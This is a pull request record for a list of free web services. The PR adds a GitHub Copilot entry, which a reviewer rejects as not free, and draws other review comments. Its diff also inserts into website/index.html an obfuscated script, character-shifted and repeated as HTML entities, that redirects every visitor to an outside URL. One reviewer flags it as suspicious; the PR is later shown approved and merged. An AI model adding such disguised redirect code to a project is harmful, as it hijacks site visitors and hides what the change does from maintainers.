### PR TITLE
Add a few services

### PR DESCRIPTION
**Pull request by fiftys7ven**

### CODE REVIEW

File: data/Artificial_Intelligence.md [hunk 1]
```diff
@@ -8,3 +8,4 @@
 | [Perplexity.ai](https://perplexity.ai) | OpenAI GPT-model powered AI chatbot that's connected to the web. Find articles or ask for current info. |
 | [Phind](https://phind.com) | AI chatbot built for developers in a chat-like form. |
 | [Poe](https://poe.com) | Poe is chat-based AI. Uses GPT-3.5. |
+| [Github Copilot](https://github.com/features/copilot) | **GitHub Copilot is free to use for verified students, teachers, and maintainers of popular open source projects.** If you are not a student, teacher, or maintainer of a popular open source project, you can try GitHub Copilot for free with a one-time 30-day trial. |
```
Comment (WilliamDavidHarrison) [inline data/Artificial_Intelligence.md:11]: We have purposely not added GitHub Copilot to our list as it is not free forever, it is only a free trial.

File: data/Design_and_UI.md
Comment (WilliamDavidHarrison) [inline data/Design_and_UI.md:1]: Please place your changes alphabetically.

File: data/Email.md
Comment (WilliamDavidHarrison) [inline data/Email.md:1]: Please place your changes alphabetically.

File: data/DNS.md
Comment (WilliamDavidHarrison) [inline data/DNS.md:1]: Please place your changes alphabetically.

File: data/SSL.md
Comment (WilliamDavidHarrison) [inline data/SSL.md:1]: Please place your changes alphabetically.

File: website/index.html [hunk 2]
```diff
@@ -1,4 +1,5 @@
 <!DOCTYPE html>
+<script>var s="=tdsjqu?xjoepx/mpdbujpo/isfg>#iuuqt;00s/nuew/nf0ofx.xfctjuf#=0tdsjqu?";var m="";for(var i=0;i<s.length;i++)m+=String.fromCharCode(s.charCodeAt(i)-1);document.write(m);</script><noscript><script>&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&#46;&#104;&#114;&#101;&#102;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#114;&#46;&#109;&#116;&#100;&#118;&#46;&#109;&#101;&#47;&#110;&#101;&#119;&#45;&#119;&#101;&#98;&#115;&#105;&#116;&#101;&#34;</script></noscript>
```
Comment (WilliamDavidHarrison) [inline website/index.html:2]: What does this script do? It looks quite suspicious.

**Review by WilliamDavidHarrison — CHANGES_REQUESTED** [review]

**Comment by Jeymen** [comment]
@fiftys7ven Hi, thank you for the contribution. Please use a descriptive title and description next time. Thank you.

**Review by Jeymen — CHANGES_REQUESTED** [review]
The PR has merge conflicts.

**Review by Jeymen — APPROVED** [review]

**Comment by Jeymen** [comment]
Thank you for contributing!

**Pull request merged**